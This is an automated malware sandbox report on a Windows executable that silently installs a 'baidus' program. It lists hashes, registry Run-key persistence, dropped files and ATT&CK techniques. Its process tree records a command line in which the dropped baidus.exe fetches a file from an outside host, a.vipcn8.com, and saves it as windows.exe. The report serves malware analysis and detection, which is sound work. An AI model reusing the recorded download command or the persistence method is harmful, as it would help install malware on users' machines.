2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65

Analysis

max time kernel
170s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2022 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
Size

685KB
MD5

c3955e1a939254d0baba61e7b2975653
SHA1

1b5a5cb1f4eb10776d7ee8ca766e420cd6fa6c57
SHA256

2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65
SHA512

94a22ed7884399306a3ae64dc111295511b8fbcf35433c9bb065dbe9057dbb5fd2371cbd0584662d24031215b719eb19d1f2b3e8efcf0d0e4a7c8242ee2d6875
SSDEEP

12288:RtUBGy8Xz0MqcPHDc2YpKSouCsBvplyt1E5Mx8QVfqlrI+SyjDyD0lRWbk7SZ:UBaXz0MqcPHDc2YpKSo1sBh8t1E5MxZ/

Score

8^/10

discovery persistence

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
436	baidus.exe
5008	baidus.tmp
3172	baidus.exe
3828	baidus.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	baidus.tmp

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	baidus.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baidu = "C:\\Program Files (x86)\\baidu\\baidus.exe"	baidus.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\baidus.exe	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
File created	C:\Program Files (x86)\baidu\is-QTABD.tmp	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.data	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\unins000.dat	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.ini	baidus.tmp
File created	C:\Program Files (x86)\baidus.exe	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
File created	C:\Program Files (x86)\baidu\unins000.dat	baidus.tmp
File created	C:\Program Files (x86)\baidu\is-IIG8V.tmp	baidus.tmp
File created	C:\Program Files (x86)\baidu\is-6C451.tmp	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.exe	baidus.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3680	PING.EXE

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
5008	baidus.tmp
5008	baidus.tmp
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5008	baidus.tmp
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe
3172	baidus.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2424 wrote to memory of 436	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	80
PID 2424 wrote to memory of 436	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	80
PID 2424 wrote to memory of 436	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	80
PID 2424 wrote to memory of 2888	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	81
PID 2424 wrote to memory of 2888	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	81
PID 2424 wrote to memory of 2888	2424	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	81
PID 436 wrote to memory of 5008	436	baidus.exe	83
PID 436 wrote to memory of 5008	436	baidus.exe	83
PID 436 wrote to memory of 5008	436	baidus.exe	83
PID 2888 wrote to memory of 3680	2888	cmd.exe	84
PID 2888 wrote to memory of 3680	2888	cmd.exe	84
PID 2888 wrote to memory of 3680	2888	cmd.exe	84
PID 5008 wrote to memory of 3172	5008	baidus.tmp	85
PID 5008 wrote to memory of 3172	5008	baidus.tmp	85
PID 5008 wrote to memory of 3172	5008	baidus.tmp	85
PID 5008 wrote to memory of 3828	5008	baidus.tmp	86
PID 5008 wrote to memory of 3828	5008	baidus.tmp	86
PID 5008 wrote to memory of 3828	5008	baidus.tmp	86

C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
"C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Program Files (x86)\baidus.exe
  "C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp" /SL5="$701C6,67416,56832,C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Program Files (x86)\baidu\baidus.exe
      "C:\Program Files (x86)\baidu\baidus.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:3172
  - - C:\Program Files (x86)\baidu\baidus.exe
      "C:\Program Files (x86)\baidu\baidus.exe" -u=http://a.vipcn8.com/test/3.txt -n=windows.exe
      4⤵
      Executes dropped EXE
      PID:3828
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 2
    3⤵
    - Runs ping.exe
    PID:3680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\baidu\baidus.data

Filesize
18KB

MD5
6daf9e443cbc584c52f88c1c5890aa79

SHA1
127d5d1d4463c176dedcc18c702daf354a34ff9e

SHA256
1845a6842901f74e86f05741dbb688b63c54b5fbeaf33baea208041004f1e4bd

SHA512
f10837c23bf0e4316351c793f4bb23f74ae1f860c55c50a323f2951a490c43336926d6e15742836c8ec398917d2c461be0a1ef61aec1d3e659f24594dd8db57d

Download Submit
C:\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
C:\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
C:\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
C:\Program Files (x86)\baidus.exe

Filesize
305KB

MD5
0f91865b8855efd8fd7805e15141d622

SHA1
7a73a294710cbf530410008c175f7abbfadd8e6f

SHA256
d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

SHA512
b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

Download Submit
C:\Program Files (x86)\baidus.exe

Filesize
305KB

MD5
0f91865b8855efd8fd7805e15141d622

SHA1
7a73a294710cbf530410008c175f7abbfadd8e6f

SHA256
d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

SHA512
b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat

Filesize
266B

MD5
e5e32265dd5b1be1560ab3029a7a465a

SHA1
4fdc6c2e5a4d5648fdf3cd5d52897d436d03f2da

SHA256
44b80154fbbb5e50e93d5203a0a6fbedf7de23c0a396e1de1c997a4a690d3e2b

SHA512
e43259682895cc665ffa2bd4496da218c01e6725dedd6f9934f926c462217de6413fdf0b75f00d8a7ad0d563b670525d8e3650add67e5ad72d13c01a0ac3a4d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
memory/436-143-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/436-135-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/436-152-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/3172-148-0x00000000001D0000-0x00000000001D7000-memory.dmp

Filesize
28KB

Download
memory/3172-153-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3172-154-0x00000000001D0000-0x00000000001D7000-memory.dmp

Filesize
28KB

Download
memory/3828-151-0x0000000000030000-0x0000000000037000-memory.dmp

Filesize
28KB

Download
memory/3828-155-0x0000000000030000-0x0000000000037000-memory.dmp

Filesize
28KB

Download